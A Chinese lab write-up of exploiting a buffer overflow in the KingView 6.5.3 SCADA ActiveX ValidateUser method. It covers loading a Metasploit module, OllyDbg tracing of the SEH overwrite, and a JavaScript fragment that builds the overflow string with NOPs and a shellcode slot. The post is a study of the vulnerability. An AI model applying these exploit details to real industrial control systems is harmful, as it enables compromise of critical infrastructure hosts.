第三方插件渗透攻击之KingView

时间:2023-12-28 09:19:14

类别:堆溢出

描述:本次渗透利用了KingView6.5.3 SCADA中的ActiveX插件中存在漏洞的方法调用target.ValidateUser(arg1, arg2),通过缓冲区溢出覆盖了SEH,再利用堆喷射成功执行payload!

参考资料:《Metasploit魔鬼训练营》p261-p269

由于Metasploit没有相应的模块,所以可以参考exploit-db上的漏洞详情,自己编写代码:

  https://www.exploit-db.com/exploits/16936/

咱对ruby还不是太熟悉,就先偷下懒了。直接将下载的源代码kingview_SCADA_activeX_validateuser.rb放到exploits/windows/browser目录下去。

源码下载地址:https://community.rapid7.com/thread/1446#comments

看了一下作者的描述,大概是说按照栈溢出的方式没能成功攻击,所以这段代码实际上使用了堆溢出。

KingView ActiveX渗透攻击过程:

由于用到ActiveX控件,所以要现在靶机ie7浏览器上取消activeX的一些禁用设置。具体在“工具”菜单----》Internet选项----》选择“安全”选项卡----》选择“自定义级别”进行设置。

然后exploit就能成功植入meterpreter啦!

KingView ActiveX漏洞机理分析:

使用漏洞发布者的POC(Proof of Concept)代码作为样本,保存为本地html,使用OllyDbg打开IE再打开这个网页。多次中断就一直按f9运行,最终中断在这条指令

(这里和书中的地址不一样,我就是不太明白为什么之前ms06_087那里的指令地址会一样)

  03C09238    880C02          mov     byte ptr [edx+eax], cl

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMMAAAAnCAIAAAA9yGtpAAACJElEQVR4nO2ZzXLDIAyE/bq8hR+59x7cUxqXHyEtC7bTZfaQwSDJ2m+I42wppU1DY3yklPZ93/f9+P6SJFgiSeJIJEkchUk6fzOGtmBXnetbQULz0UqkP93DziQWSSwoDTIo5El9awySACfqOV6Lz7uyB/9oqO58mQuLI3mtaZEUdWIrRrl4EEqYOQqsUqdvHpIG2y2S/oNoJLXOpK6jU0mqnpHELNK7b7PPpNLRKoL+UN4b05m0VrTnJFey5WfS4EbJr/BvN/hbo2XSJJsxkoQRrIe9457ttEjCW/csko6ZZgujoe49jiTpnhJJEkciSeJIJEkcuUgafBQ1Xhm0LnW3TIofmjfyAm2MNtnZHGAes3sdSfa85/PZvG4QID5QT6g5xsoQkRgZFPKskpxvJqt2ttrq7PXvfLarOm8XY5PkiQ/MwySVwauRKSQZ/VlEUqsCO0eo13TnskvR+JR6tmLYJAHm+VeGvBuEiUxSqCZPiq5zmX8j8Yn12H0QSbltg3d+DlKmazXdyNuq0xmfUs9WDKej4/00Fpf13IKkaDJ7O8W5+5DkdxSLg5E0uNG1nktSqEetFHbqbMZYHI1PqQc26WNJOmNRVlMl5giSlEXzzBte2vU4t1DqwUyaZHPpHTf+e8uCd9xAWQ/SJXc3O6lIukBX3d28vFjkdSR9Hk+fel9gN/QPrkSRSJI4EkkSRyJJ4kgkSRyJJIkjkSRxJJIkjn4ARdzbGhWWOokAAAAASUVORK5CYII=" alt="" />

也就是指令在向0x00130000写入数据时发生了异常。

按alt+m可以查看内存布局,可见上面指令的操作已经超出栈区了,因此引发异常。

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAogAAAAfCAIAAADr16s/AAAFH0lEQVR4nO1dS5bbMAzTdecWOcocxUfqvgt3Ma/zHEuESFqSTQZ4WLiMQwI0bbaZT8v39/fX19f+908+vl6v2zXQF31l9UVO4l0DE31QM+kvP4t5y4jX63W3hCmgr1jI6ouYhLsGJvqgZtLPxRwP9BULWX0Rk8DF7EMm/VzM8UBfsZDV1yiUUkopd6t4EEYNjLWx0Qc1k360mMsBmvjWGgV3kuuppOs0Kn8dLxVW+ooO+toGbakhSU7Zxuas889IMk+zUoAP9cCAp8pASfq6+I8mDJyuW/QPhGoxH7VqjrdDF64nuX68CQ/EUfmbx+ACz/aVAPS1PW8xD0w1FU2dK8UPrCUtmOGF3HVPGtySxvpar38sbIu5/AeIl3fUSZTH1rogvvUW88X8oA910QW+EuCjfJV3NIOlui/qAQMn18cAOH/37T79GlNW8bV3U380kq5I1cC3YCTjmjxX6jZTKWH1tcFB4mJuxE+vgoQ4bq0L9HAxx8Ln+NLMiYTmkCiPrTmVb69PBrdDHcQRpYBuLdNNB+pe6bMSjgVzMiJJwoJ9dZuplLA2GZ+zXv9YzPoouxmxxq11gZ67Psr+xUpfCfA5vqTbAb9UnyCdfBrIrkI8eNJI47pSdXxrYD1KC908kh1Tb306NbB+rVSqa22s42u0xTJmGoUandI56/WPhWEx17ql+PHVZiqpxMW6QA/+CPFi/mZccrrAVwJ8lK9yQB3H55+GRJ9cAsipT7K93wjNtErLGo/AQjePssl1H0D/TY3C0P9NDhe1NhbUbXZjG7eY9Y0FF2K9/rFYupglzziurwv0cDHHwmf6Ol3c5gjVgwFO3nQDqcmvz1DXlWTUCXHEYaGbp9s3Rx5TozAeuJjr85sX1wprY/Hxev1jse6jbMc8jbpU230fZd/iKwE+05fmlhk4PF0NGj3dPKfbAevBEaUAd9+6SZR5TI3CmLeYf4PNl7iY78W6n2MuFXDcV1eK8+eYY+FzfIEh2YTrLr0FBOtjADyE3bc3T65lnEqUCm79TQuOnLgPUqubb3Hj+mKWGovfdctisza2Gf85/pTFHB2f86DPAfoiiI2/ktOLTPq5mOOBvmIhqy9iEriYfcikn4s5HugrFrL6IiaBi9mHTPoL/z/mcKSvWMzqi5zEuwYm+qBm0s/FHI/0FYtZfZGTyMVM/VzM8UhfsZjVFzmJXMzUjxbz8bvSNfHfl0wn699ijUvXaWrdBX6jz59E+iLJvTUwzYfMsrrSA+1pzKRfXMxHJ5rjYxe6SRz5HXqaD8SpdRf4lXwlIH2R5P68xTy1KPU39fcXc/kPEC/v0PTFlN8Rb16n2XUX+JV8JSB9keQO/+W3Cw+K5tOmjvvq1sfPZCb9YxZzsxGgR478oxbYgrpT/Uq+EpC+SHKHC+b4TJDOAcfuuqY8D+xbOP0jP8qWzDdXlzW/Q8/6j7IX+JV8JSB9keT+vMXcfKA9kJn0dxZzPQdS/PhqsyrYXpr8Dj1gMU+tO9Wv5CsB6Yskd+NiLu84nb/DZ7KprjLJY/sWS//cxQzmY9Sisi6wqXUX+JV8JSB9keRu+eYv6YEDHkTuuvo8z+xbLP1zP8ruLqp5x83rNLvuAr+SrwSkL5LcuZjn9C2Wfv4c8+D4Ar9ZH/T0RZK78celyjtA8GJdU6oH9i2Wfv7mr3ikr1jM6oucxOsD41tC0Qc1k34u5nikr1jM6oucRC7mu/r2HP1czPFIX7GY1Rc5iVzMd/XtOfr/AVXR+Jz62J73AAAAAElFTkSuQmCC" alt="" />

咱们可以再观察一下出错处的完整代码:

aaarticlea/png;base64,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" alt="" />

实际上就是一个循环,不断把内容复制到栈区中,直到遇到NULL字符退出循环。

咱们在上图0x03c09238处下断点,重新运行ie加载漏洞html。

我们复制的目的地址从0x0012DB78开始,而ebp的值为0x0012DE58。可知缓冲区的大小为两者相减等于0x2E0。而我们渗透代码中构造超长参数的部分如下:

129                         junk1="A";
130 junk2="A";
131 while (junk1.length<624){ junk1+=junk1;}
132 junk1=junk1.substring(0,624);
133 junk2=junk1;
134 while (junk2.length<8073){ junk2+=junk2;}
135 arg2=junk1+nse+seh+nops+shell+junk2;
136 arg1="Anything";
137 vulnerable.ValidateUser(arg1 ,arg2);

可知参数的长度大于缓冲区大小,且其中不含NULL字符,必定会造成溢出。

而通过fs:[0]可以知道seh(struct exception handler)指针在栈区中的地址是0x0012DDE8。

按F9运行后可以看见开始以每次1字节的速度向内存中写入同样的数据"A"(0x41)。那我们给这个断点设置个条件,让它直接跳到覆盖seh指针的地方:

aaarticlea/png;base64,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" alt="" />

按f9运行,到达SEH处开始进行覆盖。从这里开始写入的数据就不再是无意义的“A”了,而是复制了8个字节的特意构造的数据(即上面代码135行中arg2参数的nse+seh),后面再继续用0x90(即arg2参数中的nops)填充,用作堆喷射。接着是shell这个载荷,最后再用junk2即"A"填充。

最后就像前面说的栈溢出引发了异常,程序将调用seh,也就是栈区中的se handler,地址为0x72D1204E:

